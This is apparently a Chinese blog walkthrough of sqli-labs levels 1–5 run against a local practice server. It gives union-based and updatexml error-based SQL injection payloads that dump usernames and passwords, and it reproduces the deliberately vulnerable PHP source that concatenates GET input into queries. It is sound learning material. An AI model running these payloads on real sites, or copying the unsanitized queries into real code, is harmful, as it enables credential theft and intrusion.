SQL注入

已于 2024-08-06 09:36:40 修改
阅读量512 收藏 5
点赞数 4
文章标签: sql 数据库
于 2024-01-28 20:31:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78612169/article/details/135899216
版权

Less-1

一、判断是注入点的类型

1、单引号测试

在id=1后面加上闭合符号 ' , 如果报错,则在后面加上--+将后面注释掉,如报不报错,则证明为字符型

http://127.0.0.1/sqlilabsphp7/Less-1/?id=1' -- +

二、判断字段数

order by 查询字段个数,逐级增加order by 后面的数字,直到报错。这里是order by到第4个字段时报错,所以证明有3个字段。

http://127.0.0.1/sqlilabsphp7/Less-1/?id=1 order by  4  -- +

三、使用联合查询  确定显示位置

http://127.0.0.1/sqlilabsphp7/Less-1/?id=1' union select 1,2,3  -- +

因为查询语句前面是正确的,所以显示前面的内容,后面的没有显示,所以跟该语句 使得前面错误显示后面的内容

http://127.0.0.1/sqlilabsphp7/Less-1/ 

四、查询数据库名

因为字段有三个字段所以 1 在这里只是为了占位置,version()版本号,database()库名

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,database(),version()   -- +

五、查询表名

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'  -- +

一共有以下表:

emails referers uagents users  很明显其中users是管理员的表

六、查询列名

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'-- +

七、查询用户名以及密码

因为我们已经知道了表名,所以直接可以过滤,否则会找到很多很多其他表的数据影响浏览。

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password),3 from users  -- +

至此 获得了所有的用户名以及密码 ,注入成功。

Less-2

源码:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-2 **Error Based- Intiger**</title>
</head>

<body bgcolor="#000000">




<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);


// connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</font>";  
	}
}
	else
		{ 	
		echo "Please input the ID as parameter with numeric value";
		}

?>


</font> </div></br></br></br><center>
<img src="../images/Less-2.jpg" /></center>
</body>
</html>

第二关看源码发现比第一更简单,都不需要闭合 ‘ 号,和第一关一样直接注入

Less-3

源码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-3 Error Based- String (with Twist) </title>

</head>

<body bgcolor="#000000">

<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>


</font> </div></br></br></br><center>
<img src="../images/Less-3.jpg" /></center>
</body>
</html>

第三关可以看出来是 ') 闭合方式,所以也是直接注入

Less-4

源码:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-4 Error Based- DoubleQuotes String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

</font> </div></br></br></br><center>
<img src="../images/Less-4.jpg" /></center>
</body>
</html>

第四关是")闭合方式,直接开始注入

Less-5

源码:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-5 Double Query- Single Quotes- String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3" color="#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

</font> </div></br></br></br><center>
<img src="../images/Less-5.jpg" /></center>
</body>
</html>

很明显第5关已经不一样了,可以看出来他是有报错信息,所以我们决定尝试报错注入

爆破数据库名:

?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

 

爆破表名

 ?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)
 from information_schema.tables where table_schema='security' ),0x7e),1)--+

 

 爆破列名

 ?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)
 from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

 

 注入字段:

 ?id=1' and  updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),32,64),0x7e),1)--+

小骆不吃辣(嘎嘎努力版)
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入学习sqli-lab lesson1
qq_35661990的博客
05-09 1709
之前稍微接触了一下sqli-lab,但是没有继续学下去,最近刷了些web题,发现sqli-lab用来学习数据库和php语言挺有用的。将sqlilab搭在了phpstudy上后(文件解压到phpstudy下的WWW,然后添加站点,之后改host),开始第一课。先根据提示,在url后面加上?id=1(其中问号起到传递参数的作用)。可以看到返回了两个值,通过改变id的值,可以的得到不同的login na...
sqli-labs靶场Less-1极其详细练习过程
qq_51782199的博客
03-09 449
代表URL地址的结尾与数据参数的开端,后面的参数每一个数据参数以“名称=值”的形式出现,参数与参数之间利用一个连接符&来区分。id=1.3或者随便等于一个不存在的,id=99999或者id=-1等,这样做的目的是为了不显示前面所查询的内容,显示后面的内容。0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。order by 10 对要查询表的第10个字段(第10列)进行排序(升序),用于判断字段数(报错即为没有那么多字段)。
sql注入学习(sqli-labs-master靶场第一关)_sql注入第一关靶场找flag(1)
最新发布
2303_79055586的博客
05-13 594
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqli-labs通关教程(1)
洋洋的小黑屋
09-16 698
Less-1第一关 打开网站 在url上加上?id=1’ 可以看到用户名和码。 下面我们尝试开始注入。 探测是否存在注入点: 加单引号报错 加’ and 1=1报错 加’ and 1=1 --+正常 判断为字符型注入 一般可以使用联合表的方式来提取自己想要的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错...
sql注入第一关
weixin_70464248的博客
01-30 1158
使用共享存储方式: 在共享存储方式下,负载均衡器会将webshell文件存储在共享存储设备上,而不是存储在后端服务器上。这样,无论求被转发到哪台服务器,都可以访问到相同的webshell文件,实现了连接的共享和一致性。nginx解析漏洞是指由于nginx的配置问题,导致nginx将以'.php'结尾的文件交给fastcgi处理,从而可能导致恶意用户上传包含PHP代码的文件并执行。需要注意的是,负载均衡下的webshell连接可能会面临一些挑战,比如文件分片上传导致文件被拆分到不同的后端服务器上。
SQL注入sqli第一关详细讲解
m0_50818626的博客
05-23 1245
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 1894
SQL注入闯关
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入字典fuzz
01-11
### SQL注入字典Fuzz详解 #### 一、引言 在网络安全领域,SQL注入攻击是一种常见的威胁方式,它利用数据库应用系统中的漏洞,通过恶意构造的SQL语句来获取敏感数据或对数据库进行非法操作。为了有效地检测和防范...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
SQL注入sqli-labs(less1-7)
冷冷的oO
04-24 3453
注:靶场基本上每一关的目标都是拿到数据库用户名和码。 Less-1 打开第一关看到如下页面,“Dhakkan”是印度俚语,意思是愚蠢的人,页面提示让我们输入ID值作为参数。
sqli-labs练习第一关)——字符型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1366
目录1、判断是数字型还是字符型2、通过报错判断闭合符3、确认查询的字段数量4、确认占位信息5、找库名6、查表名7、找表字段8、找用户名和码 首先,进入靶场 1、判断是数字型还是字符型 在url后面分别添加?id=1, ?id=2, ?id=2-1 ,观察页面的变化,判断是字符型还是数字型。 (如果id=2-1 与 id=1的页面一样,就是数字型;如果id=2-1与id=2的页面一样,就是字符型) http://172.16.11.222/sqli-labs/Less-1/?id=1 发现它是字符型。
SQLi-Labs刷题记录】 Less1第一关思路
gavinmao97的博客
07-21 485
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人的看法,如有不当之处,欢迎各位大佬及时批评指正! */ Less-1 GET-Error based-Single quotes-String 第一步,根据提示输入id参数 构造url:…/?id=1 显示正常,可以看见一组帐号和码,不同的id可以看见不同的帐号和码 第二步,尝试进行注入,在上一步url的基础上加入and 1=2,观察网站返回结果 构造url:…/?id=1 and 1=2 显示正常,表明and查
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值